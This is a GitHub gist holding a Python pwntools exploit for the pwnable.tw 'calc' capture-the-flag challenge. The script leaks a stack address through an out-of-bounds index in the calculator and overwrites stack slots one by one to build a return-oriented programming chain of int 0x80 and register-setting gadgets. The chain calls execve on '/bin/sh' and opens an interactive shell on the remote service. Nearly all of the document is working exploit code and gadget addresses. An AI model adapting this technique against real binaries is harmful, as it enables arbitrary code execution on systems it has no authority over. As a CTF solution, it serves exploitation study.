Skip to content

Instantly share code, notes, and snippets.

@bin2415
Last active May 15, 2018 01:38
Show Gist options
  • Save bin2415/95def2dc548354cbf7ee7624e4933c85 to your computer and use it in GitHub Desktop.
Save bin2415/95def2dc548354cbf7ee7624e4933c85 to your computer and use it in GitHub Desktop.
pwnable.tw calc
from pwn import *
from struct import pack
#/bin/sh/ = 0x6e69622f,0x0068732f
addr1 = 0x8070880 # int 80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7;ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret
bin_sh1 = 0x6e69622f
bin_sh2 = 0x0068732f
str1 = '+360\n' # get the main ebp address
p = remote('chall.pwnable.tw','10100')
# p = process('./calc')
# gdb.attach(p , '''
# break calc
# break *0x80494a6
# ''')
p.recvline()
p.send(str1)
addr_main_ebp = int(p.recvline())
print("main ebp address is ", hex(addr_main_ebp))
addr_bin_sh = addr_main_ebp + (11-(24/4+1)) * 4
###########ROP chain ##############
'''
addr3
addr2
addr2
addr2
addr2
addr4
0
addr5
0
addr_bin_sh
addr1
bin_sh1
bin_sh2'''
###########ROP chain ###############
payload_arr = [addr3, addr2, addr2, addr2, addr2, addr4, 0, addr5, 0, addr_bin_sh, addr1, bin_sh1, bin_sh2]
for i in range(len(payload_arr)):
if(i >= 9):
prex = '+37'
append = i - 9
else:
prex = '+36'
append = i + 1
send_str1 = prex +str(append)
p.sendline(send_str1)
recv1 = p.recvline()
print(recv1)
recv_val = int(recv1)
print("the 36"+str(i+1)+" content is " + str(hex(recv_val)))
offset = payload_arr[i] - recv_val
if offset > 0:
p.sendline(prex +str(append) + '+' + str(offset))
else:
offset = -1 * offset
p.sendline(prex +str(append) + '-' + str(offset))
recv_val2 = int(p.recvline())
print("the modified 36" + str(i+1) + " content is " + str(hex(recv_val2)))
p.sendline()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment